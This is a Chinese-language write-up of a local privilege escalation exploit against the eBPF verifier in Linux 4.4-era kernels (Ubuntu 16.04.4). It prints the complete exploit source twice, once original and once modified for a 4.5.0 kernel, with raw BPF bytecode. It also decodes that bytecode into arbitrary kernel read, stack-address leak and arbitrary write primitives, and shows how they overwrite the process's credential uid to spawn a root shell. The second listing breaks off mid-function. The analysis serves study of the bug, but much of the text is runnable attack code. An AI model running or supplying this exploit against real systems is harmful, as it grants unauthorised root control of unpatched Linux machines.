EXP

首先贴一下完整的payload

/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
 */

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;


char *__prog =     
        "\xb4\x09\x00\x00\xff\xff\xff\xff" //BPF_REG_0 = 0xffffffff
        "\x55\x09\x02\x00\xff\xff\xff\xff" //if BPF_REG_0 == -1 {  
        "\xb7\x00\x00\x00\x00\x00\x00\x00" // BPF_REG_0 = 0} 
        "\x95\x00\x00\x00\x00\x00\x00\x00" // exit(0)

        "\x18\x19\x00\x00\x03\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00"
        
        "\xbf\x91\x00\x00\x00\x00\x00\x00"
        "\xbf\xa2\x00\x00\x00\x00\x00\x00"
        "\x07\x02\x00\x00\xfc\xff\xff\xff"
        "\x62\x0a\xfc\xff\x00\x00\x00\x00"
        "\x85\x00\x00\x00\x01\x00\x00\x00"
        "\x55\x00\x01\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x79\x06\x00\x00\x00\x00\x00\x00"
        "\xbf\x91\x00\x00\x00\x00\x00\x00"
        "\xbf\xa2\x00\x00\x00\x00\x00\x00"
        "\x07\x02\x00\x00\xfc\xff\xff\xff"
        "\x62\x0a\xfc\xff\x01\x00\x00\x00"
        "\x85\x00\x00\x00\x01\x00\x00\x00"
        "\x55\x00\x01\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x79\x07\x00\x00\x00\x00\x00\x00"
        "\xbf\x91\x00\x00\x00\x00\x00\x00"
        "\xbf\xa2\x00\x00\x00\x00\x00\x00"
        "\x07\x02\x00\x00\xfc\xff\xff\xff"
        "\x62\x0a\xfc\xff\x02\x00\x00\x00"
        "\x85\x00\x00\x00\x01\x00\x00\x00"
        "\x55\x00\x01\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x79\x08\x00\x00\x00\x00\x00\x00"
        "\xbf\x02\x00\x00\x00\x00\x00\x00"
        "\xb7\x00\x00\x00\x00\x00\x00\x00"
        "\x55\x06\x03\x00\x00\x00\x00\x00"
        "\x79\x73\x00\x00\x00\x00\x00\x00"
        "\x7b\x32\x00\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x55\x06\x02\x00\x01\x00\x00\x00"
        "\x7b\xa2\x00\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x7b\x87\x00\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00";

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version) {
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = (__u64)insns,
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = (__u64)license,
        .log_buf = (__u64)bpf_log_buf,
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries) {
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries
    };

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)&value,
        .flags = 0,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)key,
        .value = (__u64)value,
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
    fprintf(stderr, "error: %s\n", err);
    exit(-1);
}

static void prep(void) {
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
    if (mapfd < 0)
        __exit(strerror(errno));

    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
            (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

    if (progfd < 0)
        __exit(strerror(errno));

    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
        __exit(strerror(errno));

    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
        __exit(strerror(errno));
}

static void writemsg(void) {
    char buffer[64];

    ssize_t n = write(sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        return;
    }
    if (n != sizeof(buffer))
        fprintf(stderr, "short write: %lu\n", n);
}

#define __update_elem(a, b, c) \
    bpf_update_elem(0, (a)); \
    bpf_update_elem(1, (b)); \
    bpf_update_elem(2, (c)); \
    writemsg();

static uint64_t get_value(int key) {
    uint64_t value;

    if (bpf_lookup_elem(&key, &value))
        __exit(strerror(errno));

    return value;
}

static uint64_t __get_fp(void) {
    __update_elem(1, 0, 0);

    return get_value(2);
}

static uint64_t __read(uint64_t addr) {
    __update_elem(0, addr, 0);

    return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
    __update_elem(2, addr, val);
}

static uint64_t get_sp(uint64_t addr) {
    return addr & ~(0x4000 - 1);
}

static void pwn(void) {
    uint64_t fp, sp, task_struct, credptr, uidptr;

    fp = __get_fp();
    if (fp < PHYS_OFFSET)
        __exit("bogus fp");
    
    sp = get_sp(fp);
    if (sp < PHYS_OFFSET)
        __exit("bogus sp");
    
    task_struct = __read(sp);

    if (task_struct < PHYS_OFFSET)
        __exit("bogus task ptr");

    printf("task_struct = %lx\n", task_struct);

    credptr = __read(task_struct + CRED_OFFSET); // cred

    if (credptr < PHYS_OFFSET)
        __exit("bogus cred ptr");

    uidptr = credptr + UID_OFFSET; // uid
    if (uidptr < PHYS_OFFSET)
        __exit("bogus uid ptr");

    printf("uidptr = %lx\n", uidptr);
    __write(uidptr, 0); // set both uid and gid to 0

    if (getuid() == 0) {
        printf("spawning root shell\n");
        system("/bin/bash");
        exit(0);
    }

    __exit("not vulnerable?");
}

int main(int argc, char **argv) {
    prep();
    pwn();

    return 0;
}

EXP分析

首先我们看一下prep函数，首先此函数调用了bpf_create_map函数创建了一个大小为3的map结构，并返回map的fd赋值给了mapfd参数(测试后fd值为3)

之后，调用bpf_prog_load函数申请加载一个自定义的bpf指令集，类型为BPF_PROG_TYPE_SOCKET_FILTER，需要注意的是，在linux 4.4之前，bpf这个系统调用是需要CAP_SYS_ADMIN权限的，但是在linux 4.4之后，非特权用户可以使用BPF_PROG_TYPE_SOCKET_FILTER类型和相应的map创建受限的程序，所以这里我们作为非特权用户也只能创建这样的类型

在加载指令集的过程中，实际上就已经将我们的exp虚拟执行验证后加载了，上面一篇blog讲了exp的前四句，也即触发漏洞的部分，接着我们来讲讲exp的剩余指令，也即利用部分

在利用部分的一开头是如下两行指令

1 2	"\x18\x19\x00\x00\x03\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00"

我们来看一下这两句指令在加载的过程中做了些什么

首先，来看看对应的系统调用处理函数的源码

/* last field in 'union bpf_attr' used by this command */
#define    BPF_PROG_LOAD_LAST_FIELD kern_version

static int bpf_prog_load(union bpf_attr *attr)
{
    enum bpf_prog_type type = attr->prog_type;
    struct bpf_prog *prog;
    int err;
    char license[128];
    bool is_gpl;

    if (CHECK_ATTR(BPF_PROG_LOAD))
        return -EINVAL;

    /* copy eBPF program license from user space */
    // 要看看如何访问用户空间
    if (strncpy_from_user(license, u64_to_ptr(attr->license),
                  sizeof(license) - 1) < 0)
        return -EFAULT;
    license[sizeof(license) - 1] = 0;  //拷贝完用户证书后末尾补上结束符

    /* eBPF programs must be GPL compatible to use GPL-ed functions */
    is_gpl = license_is_gpl_compatible(license); //校验证书类型

    if (attr->insn_cnt >= BPF_MAXINSNS)
        return -EINVAL;

    if (type == BPF_PROG_TYPE_KPROBE &&
        attr->kern_version != LINUX_VERSION_CODE)
        return -EINVAL;

    if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN)) // 非特权用户只允许调用BPF_PROG_TYPE_SOCKET_FILTER
        return -EPERM;

    /* plain bpf_prog allocation */
    prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
    if (!prog)
        return -ENOMEM;

    err = bpf_prog_charge_memlock(prog);
    if (err)
        goto free_prog_nouncharge;

    prog->len = attr->insn_cnt;

    err = -EFAULT;
    if (copy_from_user(prog->insns, u64_to_ptr(attr->insns), // 将指令拷贝到prog结构体
               prog->len * sizeof(struct bpf_insn)) != 0)
        goto free_prog;

    prog->orig_prog = NULL;
    prog->jited = 0;

    atomic_set(&prog->aux->refcnt, 1);
    prog->gpl_compatible = is_gpl ? 1 : 0;

    /* find program type: socket_filter vs tracing_filter */
    err = find_prog_type(type, prog);
    if (err < 0)
        goto free_prog;

    /* run eBPF verifier */
    err = bpf_check(&prog, attr); // 调用bpf_check
    if (err < 0)
        goto free_used_maps;

    /* fixup BPF_CALL->imm field */
    fixup_bpf_calls(prog);

    /* eBPF program is ready to be JITed */
    err = bpf_prog_select_runtime(prog);
    if (err < 0)
        goto free_used_maps;

    err = bpf_prog_new_fd(prog);
    if (err < 0)
        /* failed to allocate fd */
        goto free_used_maps;

    return err;

free_used_maps:
    free_used_maps(prog->aux);
free_prog:
    bpf_prog_uncharge_memlock(prog);
free_prog_nouncharge:
    bpf_prog_free(prog);
    return err;
}

可以看到实际上我们的指令在虚拟加载时，并不是像前文一样直接到了do_check函数，而是先到了bpf_check函数(前文为了直接讨论核心部分，省略了此部分)

那么来看看bpf_check函数

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
    char __user *log_ubuf = NULL;
    struct verifier_env *env;
    int ret = -EINVAL;

    if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
        return -E2BIG;

    /* 'struct verifier_env' can be global, but since it's not small,
     * allocate/free it every time bpf_check() is called
     */
    env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
    if (!env)
        return -ENOMEM;

    env->prog = *prog;

    /* grab the mutex to protect few globals used by verifier */
    mutex_lock(&bpf_verifier_lock);

    if (attr->log_level || attr->log_buf || attr->log_size) {
        /* user requested verbose verifier output
         * and supplied buffer to store the verification trace
         */
        log_level = attr->log_level;
        log_ubuf = (char __user *) (unsigned long) attr->log_buf;
        log_size = attr->log_size;
        log_len = 0;

        ret = -EINVAL;
        /* log_* values have to be sane */
        if (log_size < 128 || log_size > UINT_MAX >> 8 ||
            log_level == 0 || log_ubuf == NULL)
            goto free_env;

        ret = -ENOMEM;
        log_buf = vmalloc(log_size);
        if (!log_buf)
            goto free_env;
    } else {
        log_level = 0;
    }

    ret = replace_map_fd_with_map_ptr(env);
    if (ret < 0)
        goto skip_full_check;

    env->explored_states = kcalloc(env->prog->len,
                       sizeof(struct verifier_state_list *),
                       GFP_USER);
    ret = -ENOMEM;
    if (!env->explored_states)
        goto skip_full_check;

    ret = check_cfg(env);
    if (ret < 0)
        goto skip_full_check;

    env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

    ret = do_check(env);

skip_full_check:
    while (pop_stack(env, NULL) >= 0);
    free_states(env);

    if (ret == 0)
        /* program is valid, convert *(u32*)(ctx + off) accesses */
        ret = convert_ctx_accesses(env);

    if (log_level && log_len >= log_size - 1) {
        BUG_ON(log_len >= log_size);
        /* verifier log exceeded user supplied buffer */
        ret = -ENOSPC;
        /* fall through to return what was recorded */
    }

    /* copy verifier log back to user space including trailing zero */
    if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
        ret = -EFAULT;
        goto free_log_buf;
    }

    if (ret == 0 && env->used_map_cnt) {
        /* if program passed verifier, update used_maps in bpf_prog_info */
        env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
                              sizeof(env->used_maps[0]),
                              GFP_KERNEL);

        if (!env->prog->aux->used_maps) {
            ret = -ENOMEM;
            goto free_log_buf;
        }

        memcpy(env->prog->aux->used_maps, env->used_maps,
               sizeof(env->used_maps[0]) * env->used_map_cnt);
        env->prog->aux->used_map_cnt = env->used_map_cnt;

        /* program is valid. Convert pseudo bpf_ld_imm64 into generic
         * bpf_ld_imm64 instructions
         */
        convert_pseudo_ld_imm64(env);
    }

free_log_buf:
    if (log_level)
        vfree(log_buf);
free_env:
    if (!env->prog->aux->used_maps)
        /* if we didn't copy map pointers into bpf_prog_info, release
         * them now. Otherwise free_bpf_prog_info() will release them.
         */
        release_maps(env);
    *prog = env->prog;
    kfree(env);
    mutex_unlock(&bpf_verifier_lock);
    return ret;
}

这里我们主要关注replace_map_fd_with_map_ptr函数，这个函数主要是将我们之前得到的mapfd转化为map的指针，以保证我们申请的map可以和我们申请的bpf指令联系起来

来看看这个函数的实现

static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
    struct bpf_insn *insn = env->prog->insnsi;
    int insn_cnt = env->prog->len;
    int i, j;

    for (i = 0; i < insn_cnt; i++, insn++) {  // 大循环，遍历我们的想要加载的每一条指令
        if (BPF_CLASS(insn->code) == BPF_LDX &&
            (BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
            verbose("BPF_LDX uses reserved fields\n");
            return -EINVAL;
        }

        if (BPF_CLASS(insn->code) == BPF_STX &&
            ((BPF_MODE(insn->code) != BPF_MEM &&
              BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
            verbose("BPF_STX uses reserved fields\n");
            return -EINVAL;
        }

        if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { // 我们的payload中第五行，code部分为0x18，符合条件，进入此分支
            struct bpf_map *map;
            struct fd f;

            // 判断payload的第六行是否全空，这里与BPF_LD_IMM64这个指令的结构有关，后面会讲到
            if (i == insn_cnt - 1 || insn[1].code != 0 ||
                insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
                insn[1].off != 0) {
                verbose("invalid bpf_ld_imm64 insn\n");
                return -EINVAL;
            }

            if (insn->src_reg == 0)
                /* valid generic load 64-bit imm */
                goto next_insn;

            if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
                verbose("unrecognized bpf_ld_imm64 insn\n");
                return -EINVAL;
            }
            // 从给出的fd得到指针
            f = fdget(insn->imm);
            map = __bpf_map_get(f);
            if (IS_ERR(map)) {
                verbose("fd %d is not pointing to valid bpf_map\n",
                    insn->imm);
                fdput(f);
                return PTR_ERR(map);
            }
            // 保存指针，可以看到，其把指针的值分为了两部分，低32位保存在了exp第五行的IMM区域(最后4个字节)，高32位则保存在了exp第六行的IMM区域
            /* store map pointer inside BPF_LD_IMM64 instruction */
            insn[0].imm = (u32) (unsigned long) map;
            insn[1].imm = ((u64) (unsigned long) map) >> 32;

            /* check whether we recorded this map already */
            for (j = 0; j < env->used_map_cnt; j++)
                if (env->used_maps[j] == map) {
                    fdput(f);
                    goto next_insn;
                }

            if (env->used_map_cnt >= MAX_USED_MAPS) {
                fdput(f);
                return -E2BIG;
            }

            /* remember this map */
            env->used_maps[env->used_map_cnt++] = map;

            /* hold the map. If the program is rejected by verifier,
             * the map will be released by release_maps() or it
             * will be used by the valid program until it's unloaded
             * and all maps are released in free_bpf_prog_info()
             */
            bpf_map_inc(map, false);
            fdput(f);
next_insn:
            insn++;
            i++;
        }
    }

    /* now all pseudo BPF_LD_IMM64 instructions load valid
     * 'struct bpf_map *' into a register instead of user map_fd.
     * These pointers will be used later by verifier to validate map access.
     */
    return 0;
}

可以从上面的源代码以及我的相应注释中看到，此函数检查我们的指令中是否存在BPF_LD_IMM64指令，如果存在的话，将指令中的立即数所表示的fd转化为指针，保存指针值在我们的exp的第五行以及第六行的IMM区域

我们第五行的立即数IMM为0x3，我上面有说过，我们一开始申请的map的fd就是3，所以这里就相当于我们将我们之前申请的map与我们的指令进行了绑定

在注释中我提到为何第六行必须为空，实际上有两个原因，首先是BPF_LD_IMM64指令的格式就是这么要求的

#define BPF_LD_IMM64(DST, IMM)                    \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_LD | BPF_DW | BPF_IMM,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = (__u32) (IMM) }),            \
    ((struct bpf_insn) {                    \
        .code  = 0, /* zero is reserved opcode */    \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = ((__u64) (IMM)) >> 32 })

可以看到，实际上调用BPF_LD_IMM64指令就是调用了BPF_LD_IMM64_RAW指令，此指令需要占据普通指令的2倍大小的空间

另外，由于指针的值需要被分为两部分储存，故而确实需要第六条指令为空来做存储

好了，我们接着看下面第七条指令之后的指令

将其解码之后，指令是这样的

// 上面两句payload执行完成后会将map的指针赋值给BPF_REG_9寄存器中
[6]: ALU64_MOV_X(9,1,0x0,0x0)
[7]: ALU64_MOV_X(10,2,0x0,0x0)
[8]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[9]: ST_MEM_W(0,10,0xfffc,0x0)
[10]: JMP_CALL(0,0,0x0,0x1)
[11]: JMP_JNE_K(0,0,0x1,0x0)
[12]: JMP_EXIT(0,0,0x0,0x0)
[13]: LDX_MEM_DW(0,6,0x0,0x0)
[14]: ALU64_MOV_X(9,1,0x0,0x0)
[15]: ALU64_MOV_X(10,2,0x0,0x0)
[16]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[17]: ST_MEM_W(0,10,0xfffc,0x1)
[18]: JMP_CALL(0,0,0x0,0x1)
[19]: JMP_JNE_K(0,0,0x1,0x0)
[20]: JMP_EXIT(0,0,0x0,0x0)
[21]: LDX_MEM_DW(0,7,0x0,0x0)
[22]: ALU64_MOV_X(9,1,0x0,0x0)
[23]: ALU64_MOV_X(10,2,0x0,0x0)
[24]: ALU64_ADD_K(0,2,0x0,0xfffffffc)
[25]: ST_MEM_W(0,10,0xfffc,0x2)
[26]: JMP_CALL(0,0,0x0,0x1)
[27]: JMP_JNE_K(0,0,0x1,0x0)
[28]: JMP_EXIT(0,0,0x0,0x0)
[29]: LDX_MEM_DW(0,8,0x0,0x0)
[30]: ALU64_MOV_X(0,2,0x0,0x0)
[31]: ALU64_MOV_K(0,0,0x0,0x0)
[32]: JMP_JNE_K(0,6,0x3,0x0)
[33]: LDX_MEM_DW(7,3,0x0,0x0)
[34]: STX_MEM_DW(3,2,0x0,0x0)
[35]: JMP_EXIT(0,0,0x0,0x0)
[36]: JMP_JNE_K(0,6,0x2,0x1)
[37]: STX_MEM_DW(10,2,0x0,0x0)
[38]: JMP_EXIT(0,0,0x0,0x0)
[39]: STX_MEM_DW(8,7,0x0,0x0)
[40]: JMP_EXIT(0,0,0x0,0x0)

另附上参考表

R0 – rax
R1 - rdi
R2 - rsi
R3 - rdx
R4 - rcx
R5 - r8
R6 - rbx
R7 - r13
R8 - r14
R9 - r15
R10 – rbp（帧指针，frame pointer）

先来看看6～13，翻译出来应该是

[6]: r1=r9
[7]: r2=rbp
[8]: r2 = r2-4
[9]: [rbp+(-4)] = 0
[10]: call BPF_FUNC_map_lookup_elem
[11]: if r0== 0:
[12]: exit(0)
[13]: r6=[r0]

其中编号9的语句，为ST_MEM_W类型的指令，表达的意思是*(uint *) (dst_reg + off16) = imm32，那么带入到此语句即向$rbp-4处赋值0，此举是为了准备参数(r2寄存器)，准备调用BPF_FUNC_map_lookup_elem

编号为11的语句，BPF_FUNC_map_lookup_elem返回的是指针，所以r0中存放的是&map[0]

static u64 bpf_map_lookup_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5)
{
    /* verifier checked that R1 contains a valid pointer to bpf_map
     * and R2 points to a program stack and map->key_size bytes were
     * initialized
     */
    struct bpf_map *map = (struct bpf_map *) (unsigned long) r1;
    void *key = (void *) (unsigned long) r2;
    void *value;

    WARN_ON_ONCE(!rcu_read_lock_held());

    value = map->ops->map_lookup_elem(map, key);

    /* lookup() returns either pointer to element value or NULL
     * which is the meaning of PTR_TO_MAP_VALUE_OR_NULL type
     */
    return (unsigned long) value;  // 返回指针c
}

在6～13语句执行完成后就相当于将r6赋值为map中第一个元素的值

之后的14-21，22-29都是一样的，分别表示的意思是r7 = map[1],r8 = map[2]

从30行开始，翻译如下

[30]: ALU64_MOV_X(0,2,0x0,0x0) r2=r0 // 此时r0为map[2]的地址
[31]: ALU64_MOV_K(0,0,0x0,0x0) r0=0  // r0置0
[32]: JMP_JNE_K(0,6,0x3,0x0)   if r6!=0 jmpto 36 
[33]: LDX_MEM_DW(7,3,0x0,0x0)  r3 = [r7]
[34]: STX_MEM_DW(3,2,0x0,0x0)  [r2]=r3
[35]: JMP_EXIT(0,0,0x0,0x0)    exit(0)
[36]: JMP_JNE_K(0,6,0x2,0x1)   if r6!=1 jmpto 39
[37]: STX_MEM_DW(10,2,0x0,0x0) [r2]=r10
[38]: JMP_EXIT(0,0,0x0,0x0)    exit(0)
[39]: STX_MEM_DW(8,7,0x0,0x0)  [r7]=r8
[40]: JMP_EXIT(0,0,0x0,0x0)    exit(0)

可以看到，这是最终执行利用的地方

在经过了6～29语句之后，r6 = map[0]，r7 = map[1],r8 = map[2]

而且map中的值是由用户定义的，用户可以通过BPF_MAP_UPDATE_ELEM这一bpf的调用type来改变map中每一项的值

那么根据上面的翻译

如果用户定义map[0] = 0,那么此时将会执行33-35语句，也就是尝试读map[1]中所保存的值所指向的地址中的值，并把读出的值赋值给map[2]
如果用户定义map[0] = 1,那么此时将会执行37-38语句，也就是尝试将r10寄存器的值赋值给map[2]，而r10在这里代表的是rbp
如果用户定义map[0] = 2,那么此时将会执行39-40语句，也就是尝试将map[2]中的值赋值给map[1]中所保存的值所指向的地址

简而言之，当map[0]为1、2、3时，分别代表了任意地址读，泄露内核栈地址、任意地址写这三个功能

知道了这些后，exp就十分容易明白了

贴出我修改的exp，在我的机器上运行成功

// Tested on:
// Linux 4.5.0 #0 SMP x86_64 GNU/Linux
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x9f8
#define UID_OFFSET 4
#define EUID_OFFSET 20
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;

char *__prog =     
        "\xb4\x09\x00\x00\xff\xff\xff\xff"
        "\x55\x09\x02\x00\xff\xff\xff\xff"
        "\xb7\x00\x00\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x18\x19\x00\x00\x03\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00"
        "\xbf\x91\x00\x00\x00\x00\x00\x00"
        "\xbf\xa2\x00\x00\x00\x00\x00\x00"
        "\x07\x02\x00\x00\xfc\xff\xff\xff"
        "\x62\x0a\xfc\xff\x00\x00\x00\x00"
        "\x85\x00\x00\x00\x01\x00\x00\x00"
        "\x55\x00\x01\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x79\x06\x00\x00\x00\x00\x00\x00"
        "\xbf\x91\x00\x00\x00\x00\x00\x00"
        "\xbf\xa2\x00\x00\x00\x00\x00\x00"
        "\x07\x02\x00\x00\xfc\xff\xff\xff"
        "\x62\x0a\xfc\xff\x01\x00\x00\x00"
        "\x85\x00\x00\x00\x01\x00\x00\x00"
        "\x55\x00\x01\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x79\x07\x00\x00\x00\x00\x00\x00"
        "\xbf\x91\x00\x00\x00\x00\x00\x00"
        "\xbf\xa2\x00\x00\x00\x00\x00\x00"
        "\x07\x02\x00\x00\xfc\xff\xff\xff"
        "\x62\x0a\xfc\xff\x02\x00\x00\x00"
        "\x85\x00\x00\x00\x01\x00\x00\x00"
        "\x55\x00\x01\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x79\x08\x00\x00\x00\x00\x00\x00"
        "\xbf\x02\x00\x00\x00\x00\x00\x00"
        "\xb7\x00\x00\x00\x00\x00\x00\x00"
        "\x55\x06\x03\x00\x00\x00\x00\x00"
        "\x79\x73\x00\x00\x00\x00\x00\x00"
        "\x7b\x32\x00\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x55\x06\x02\x00\x01\x00\x00\x00"
        "\x7b\xa2\x00\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00"
        "\x7b\x87\x00\x00\x00\x00\x00\x00"
        "\x95\x00\x00\x00\x00\x00\x00\x00";

char bpf_log_buf[LOG_BUF_SIZE];

// 加载bpf指令至内核
static int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version) {
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = (__u64)insns,
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = (__u64)license,
        .log_buf = (__u64)bpf_log_buf,
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };

    attr.kern_version = kern_version;

    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

// 申请map
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries) {
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries
    };
    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

// 更新map中元素的值
static int bpf_update_elem(uint64_t key, uint64_t value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)&value,
        .flags = 0,
    };

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

// 获取map中元素的值
// 这里需要区别BPF_MAP_LOOKUP_ELEM这个系统调用和我们在bpf指令中调用的BPF_FUNC_map_lookup_elem这两者的区别
// 实际上他们的调用基本上是一致的，但是BPF_FUNC_map_lookup_elem得到的是元素的指针，而BPF_MAP_LOOKUP_ELEM在得到元素的指针后，会调用copy_to_user这个函数来讲指针指向的元素值赋值回value
static int bpf_lookup_elem(void *key, void *value) {
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)key,
        .value = (__u64)value,
    };

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
    fprintf(stderr, "error: %s\n", err);
    exit(-1);
}

static void prep(void) {
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);  // 申请一个长度为3的map
    if (mapfd < 0)
        __exit(strerror(errno));
    printf("map fd is %d\n",mapfd);
    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
            (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);                  // 将我们的payload加载入内核

    if (progfd < 0) {
        __exit(strerror(errno));
    }
    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))     // 创建socket，用于触发内核执行我们的payload
        __exit(strerror(errno));
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
        __exit(strerror(errno));
}

// 向socket中写入数据，仅为了触发内核执行我们的bpf代码
static void writemsg(void) {
    char buffer[64];

    ssize_t n = write(sockets[0], buffer, sizeof(buffer));

    if (n < 0) {
        perror("write");
        return;
    }
    if (n != sizeof(buffer))
        fprintf(stderr, "short write: %lu\n", n);
}

// 定义map中各项的值
#define __update_elem(a, b, c) \
    bpf_update_elem(0, (a)); \
    bpf_update_elem(1, (b)); \
    bpf_update_elem(2, (c)); \
    writemsg();

// 尝试获取map中指定key的value
static uint64_t get_value(int key) {
    uint64_t value;

    if (bpf_lookup_elem(&key, &value))
        __exit(strerror(errno));

    return value;
}

// 尝试获得内核栈地址
static uint64_t __get_fp(void) {
    __update_elem(1, 0, 0);

    return get_value(2);
}

// 尝试任意地址读
static uint64_t __read(uint64_t addr) {
    __update_elem(0, addr, 0);

    return get_value(2);
}

// 尝试任意地址写
static void __write(uint64_t addr, uint64_t val) {
    __update_elem(2, addr, val);
}

// 尝试获得rsp地址，也即存储task_struct地址的地址
static uint64_t get_sp(uint64_t addr) {
    return addr & ~(0x4000 - 1);
}

static void pwn(void) {
    uint64_t fp, sp, task_struct, credptr, uidptr,gidptr;

    fp = __get_fp(); // 得到rbp的值
    if (fp < PHYS_OFFSET)
        __exit("bogus fp");
